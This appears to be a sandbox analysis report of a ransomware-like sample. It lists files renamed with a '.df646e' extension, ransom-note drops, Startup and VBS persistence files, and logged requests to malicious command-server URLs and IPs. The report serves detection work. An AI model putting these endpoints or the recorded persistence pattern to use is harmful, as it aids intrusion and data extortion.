C:\Users\admin\Documents\otherwiselord.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\historyco.rtf.df646e
binary
MD5: 4296a2eb0820d769d38bb2a82b43bb31
SHA256: 11bf6f0347254234f914515737e9b1eff04b8da959aa04ab144d73fbf9ed92b2
2460
powershell.exe
C:\Users\admin\Documents\historyco.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\billbid.rtf.df646e
binary
MD5: 591ad55fb5bb78e9b2bfa6c6b6703e6e
SHA256: e905dd2aea131d15de4804b4295052077fbefce09f77bd82fcde2e8b3a979285
2460
powershell.exe
C:\Users\admin\Documents\billbid.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\admin\Documents\baskettuesday.rtf.df646e
binary
MD5: 92a5a4c08f7d6fc65959ccf8b8b04d7b
SHA256: fb4d223ef8fcf78ef6125f6d7d362502d1adc35949b8a0a72971c27dbcfa6af3
2460
powershell.exe
C:\Users\admin\Documents\baskettuesday.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.df646e
binary
MD5: 33d1542d91acc5a1c2333f8fb6d1ddc8
SHA256: 801992927608c9d6ca0928966cc1635cd60c68fe59d0a608aa33db4b2723a98b
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.df646e
binary
MD5: e34fdc7aa937eaea3bf8305b65e85371
SHA256: 45b216abfe91ca1ba87b7c178336295621a45f8b7de1f6979df88dca970184de
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: 6b79ce6144ee11cef8309d46be733094
SHA256: 2894aeaa875cc0946519cb0f3d9cd3e7eacd82befae652d9cbf8b03d33361c4d
2460
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\thinkingvillage.png.df646e
binary
MD5: b92976b62fb4bd6d1029a247df4556f8
SHA256: 9c30ab3c163044e624313984f96ed504d450309f2b9df19f0c6fd3be31bffa08
2460
powershell.exe
C:\Users\admin\Desktop\thinkingvillage.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\subjectmy.rtf.df646e
binary
MD5: f57f27ed523a808fcb6788b27430d9cc
SHA256: 0344ccbccb073e48d602da94a2c46fd95f6de3b0a0b3249241bf5407f8bcd7a5
2460
powershell.exe
C:\Users\admin\Desktop\subjectmy.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\programsrace.png.df646e
binary
MD5: 73579fc53defe2d68aeee701f73fbc65
SHA256: b57f0f87c51e9c5aa923945a3fbb91a752f9296f6fe8c134b7151ee77c98116a
2460
powershell.exe
C:\Users\admin\Desktop\programsrace.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\octoberrules.png.df646e
binary
MD5: 5b7c44fa0c4ff23738d0ad8038dc44c3
SHA256: b6338ae2b2fb315cc5cc6068f9c47553fde34a733b53f88320c77e53097b9f66
2460
powershell.exe
C:\Users\admin\Desktop\octoberrules.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\nomd.rtf.df646e
binary
MD5: d4b0c67c2d8ed79d17bae8c78146027e
SHA256: 35baeac9d170201651a1eae13bde2c71731c0dbde30d91a8b469846596a0a2b7
2460
powershell.exe
C:\Users\admin\Desktop\nomd.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\networkingnorth.rtf.df646e
binary
MD5: 3eaccb4a299e9f9b19563818420f0ecb
SHA256: 53bf39d2447ae1977a0d6142decb465f4b4aca3521315187e82c6c3323b23518
2460
powershell.exe
C:\Users\admin\Desktop\networkingnorth.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\marketmake.rtf.df646e
binary
MD5: 55d6785a363e357701affa779cdc2670
SHA256: ca8af85c84f0ad02180df2fa8b3360c8d857b463a641f8aca84a8bf97244a077
2460
powershell.exe
C:\Users\admin\Desktop\marketmake.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\iiwindow.png.df646e
binary
MD5: 9e7150d5abcc55cf8b44d1286430a920
SHA256: 278cfe80eabf8860df37be66584f0a241cde7d18324a6e311a2f1c1151f7b2e6
2460
powershell.exe
C:\Users\admin\Desktop\iiwindow.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\hugeuseful.png.df646e
binary
MD5: b6dea066387241a6dd9653e9ad4bdb8a
SHA256: 7ce4087098378cce754e20f2f04a0acd280733eabbb8b4b1cc7c14a89d4c795e
2460
powershell.exe
C:\Users\admin\Desktop\hugeuseful.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\chinateen.rtf.df646e
binary
MD5: 8e205eab11510d8d9b7401acfdc09c08
SHA256: f0733fdd8a4b3713c9ace2d0b4d2af474951f3c878c89f745b7cf415597f9797
2460
powershell.exe
C:\Users\admin\Desktop\chinateen.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Desktop\cellsthird.jpg.df646e
binary
MD5: b9036ba1b29c3f2f950fe71b97c7784f
SHA256: 310fb58bbee51882e1a5d6845bcb0fecbe9699e7675f15548d85c9b79a43372d
2460
powershell.exe
C:\Users\admin\Desktop\cellsthird.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Local\Temp\quanto98.tmp
text
MD5: 2b9b17984c63269dd2222d2616c4dc8a
SHA256: 542b799b79f77798a498d3878d49650113b653dbf1a81f08a3d29e2af50d2d04
2460
powershell.exe
C:\Users\admin\Desktop\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\admin\Desktop\advancedchicago.png.df646e
binary
MD5: 911d3f031f4df03b0af0f2559fd8fc2c
SHA256: 39193a8166511f63499bab4388894f4111c2f200243bb34e4acfe7b33d96955b
2460
powershell.exe
C:\Users\admin\Desktop\advancedchicago.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Local\Temp\quanto98.tmp
text
MD5: 0782285873be7aad0b1a8600ca57922e
SHA256: 889225739fb8bfd9581f191c003d9b46dcf81a5114927fa3b866cc575b6766aa
2460
powershell.exe
C:\Users\Public\OracleKit\w00log03.tmp
text
MD5: d2151d420c86308a91c9fe0d7b9997f4
SHA256: 5fe8b28518548c4fc19ff958f5e84bc02eb21550e94301a09ac4e2efd03d6ff4
2460
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsApplicationService.lnk
lnk
MD5: cafd66d2e1ec763072942095f53f40ed
SHA256: 2e350e1aa2101cf05654585e48bd906b71a9676d3cc8162ce6100371e67f86af
2460
powershell.exe
C:\Users\Public\Libraries\WindowsIndexingService.vbs
text
MD5: e357f8b2f0110c7153bdf02a355c61b6
SHA256: 4eb5b4bb452cf58e9f4980f75db2cf51b42b2909c593384c416b7895f948eaa0
2296
vlc.exe
C:\Users\admin\AppData\Roaming\vlc\vlcrc
text
MD5: fb9b36ccdf9f0e31539438938f75d197
SHA256: dfde1f8fb276e72fdcd797ec620832509fc5c5834fa6ea1e683a6f24d9965558
2296
vlc.exe
C:\Users\admin\AppData\Roaming\vlc\vlcrc.2296
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDEE.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDED.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Roaming\vlc\vlc-qt-interface.ini
text
MD5: 410e10ae13b877d23291d14c7b14be97
SHA256: 9a7c5f346c93e61fc3521ff0a6e9a1c515ff6134504c5a40f83b6b4f72308bb9
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDCD.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDCC.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDCB.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDCA.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDC9.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDB8.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDB7.tmp
––
MD5:  ––
SHA256:  ––
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCEDB6.tmp
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Libraries\961600
text
MD5: e357f8b2f0110c7153bdf02a355c61b6
SHA256: 4eb5b4bb452cf58e9f4980f75db2cf51b42b2909c593384c416b7895f948eaa0
2296
vlc.exe
C:\Users\admin\AppData\Local\Temp\VLCE662.tmp
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Local\Temp\ramst007.mp3
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF158a38.TMP
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HL3ZVOAYE3NWX44LR2D8.temp
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
6
TCP/UDP connections
21
DNS requests
21
Threats
1

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2460 powershell.exe GET 200 31.214.157.155:80 http://ceco.myheritageins.com/?need=streetm&vid=vbs4&4643 NL
text
malicious
2460 powershell.exe GET 200 31.214.157.155:80 http://ceco.myheritageins.com/?need=aegzfej&vid=vbs4& NL
text
malicious
2460 powershell.exe POST 200 185.158.248.151:80 http://ceco.jasonrsheldon.com/ RO
text
text
malicious
2460 powershell.exe POST 200 185.158.248.151:80 http://ceco.jasonrsheldon.com/ RO
text
text
malicious
2744 powershell.exe POST 200 185.212.47.91:80 http://cdn.unitycareers.com/ DE
text
text
malicious
2744 powershell.exe POST 200 185.212.47.91:80 http://cdn.unitycareers.com/ DE
text
text
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2460 powershell.exe 207.241.224.2:443 Internet Archive US unknown
2460 powershell.exe 207.241.228.42:443 Internet Archive US unknown
2460 powershell.exe 31.214.157.155:80 easystores GmbH NL malicious
2460 powershell.exe 185.158.248.151:80 M247 Ltd RO malicious
1952 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
1952 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2944 IEXPLORE.EXE 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
1952 iexplore.exe 23.197.15.213:443 Akamai Technologies, Inc. NL whitelisted
1952 iexplore.exe 204.79.197.203:443 Microsoft Corporation US whitelisted
1952 iexplore.exe 13.92.246.37:443 Microsoft Corporation US whitelisted
2744 powershell.exe 185.212.47.91:80 23media GmbH DE malicious

DNS requests

Domain IP Reputation
archive.org 207.241.224.2
whitelisted
ia802302.us.archive.org 207.241.228.42
unknown
ceco.myheritageins.com 31.214.157.155
malicious
ceco.jasonrsheldon.com 185.158.248.151
unknown
api.bing.com 13.107.5.80
whitelisted
www.bing.com 204.79.197.200
whitelisted
iecvlist.microsoft.com 152.199.19.161
whitelisted
r20swj13mr.microsoft.com 152.199.19.161
whitelisted
ieonline.microsoft.com 204.79.197.200
whitelisted
go.microsoft.com 23.197.15.213
whitelisted
www.msn.com 204.79.197.203
whitelisted
query.prod.cms.msn.com 13.92.246.37
whitelisted
cdn.unitycareers.com 185.212.47.91
malicious

Threats

No threats detected.

Debug output strings

Process Message
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn